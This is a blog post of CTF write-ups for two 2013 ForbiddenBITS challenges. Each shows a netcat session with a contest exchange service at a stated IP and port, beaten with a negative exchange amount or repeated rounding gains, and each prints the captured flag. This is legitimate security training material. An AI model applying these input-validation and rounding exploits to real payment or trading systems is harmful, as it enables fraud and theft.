March | 2013 | FOR-BIN-SEC

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ _ _ 94 _________ ______ ______ _ _ _____ ______ ______ \ \ / / | | | | | \ | | | | | | | | | | | | | | \ \ | | >|--|< | | | | | | | |__| | | | | |--| | | | | | | | | |---- /_/ \_\ |_| |_| |_| |_| |_| |_|____ |_| |_| _|_|_ |_| |_| |_|____ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Really Wanna Trade with us ? yes/no yes Enter Username : SAM Welcome SAM Enter your Command : [1] balance [2] exchange [3] transfert [4] restricted area 1 Your Balance : 100 USD , 100 EUR , 100 GBP Enter your Command : [1] balance [2] exchange [3] transfert [4] restricted area 2 Enter Destination currency GBP Enter Source currency EUR Enter Amount -20000000000000 Your Balance : 100 USD , 20000000000100 EUR , -17199999999900 GBP Enter your Command : [1] balance [2] exchange [3] transfert [4] restricted area 2 Enter Destination currency USD Enter Source currency EUR Enter Amount 10000 Your Balance : 10900 USD , 19999999990100 EUR , -17199999999900 GBP Enter your Command : [1] balance [2] exchange [3] transfert [4] restricted area 4 FLAG{54f882f08e3baab9d21e5f2aec4d85646a718181}

I have never participated in any CTFs after last years IFSF CTF. So I thought to start actively participate in all upcoming CTFs from this year’s ForbiddenbitsCTF. I solved two challenges in this contest. There was a service running in 95.170.83.28 3003 and we were asked to enter the restricted area by having a balance more than $5000. We were only given 100$, 100 Euros and 100 GBP as the main balance. After a lot of struggle, I found a bug in the program that if you exchange money within your account (i.e from GBP to EURO and vice-versa) after a single rotation, the balance will be increased by 100.1 EURO’s. Then I didn’t waste much time to write a script :-p I did it manually (of course it took very less time as they asked only balance above 5000 USD)

$ nc 95.170.83.28 3003
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 _    _  93   _________   ______   ______  _    _  _____  ______   ______ 
\ \  / /     | | | | | \ | |  | | | |     | |  | |  | |  | |  \ \ | |     
 >|--|<      | | | | | | | |__| | | |     | |--| |  | |  | |  | | | |---- 
/_/  \_\     |_| |_| |_| |_|  |_| |_|____ |_|  |_| _|_|_ |_|  |_| |_|____ 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Really Wanna Trade with us ? yes/no
yes
Enter Username :
SAM

Welcome SAM

Enter your Command :

[1] balance
[2] exchange
[3] transfert
[4] restricted area
2

Enter Destination currency
EUR

Enter Source currency
GBP

Enter Amount
100

Your Balance : 100 USD , 253.85 EUR , 0 GBP

Enter your Command :

[1] balance
[2] exchange
[3] transfert
[4] restricted area
2

Enter Destination currency
GBP

Enter Source currency
EUR

Enter Amount
253.85

Your Balance : 100 USD , 0 EUR , 218.31 GBP

Enter your Command :

[1] balance
[2] exchange
[3] transfert
[4] restricted area
2

Enter Destination currency
EUR

Enter Source currency
GBP

Enter Amount
218.31

Your Balance : 100 USD , 335.86 EUR , 0 GBP

Enter your Command :

[1] balance
[2] exchange
[3] transfert
[4] restricted area
2

Enter Destination currency
GBP

Enter Source currency
EUR

Enter Amount
335.86

Your Balance : 100 USD , 0 EUR , 288.84 GBP

.
.
.
.
.
.
.

Your Balance : 6062.7 USD, 0 EUR , 0 GBP

[1] balance
[2] exchange
[3] transfert
[4] restricted area
4
FLAG{7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0}

FOR-BIN-SEC

Yet another blog by a security enthusiast!

Month: March 2013

ForbiddenBITSCTF x94 Machine

ForbiddenBITS CTF 2013 x93 Machine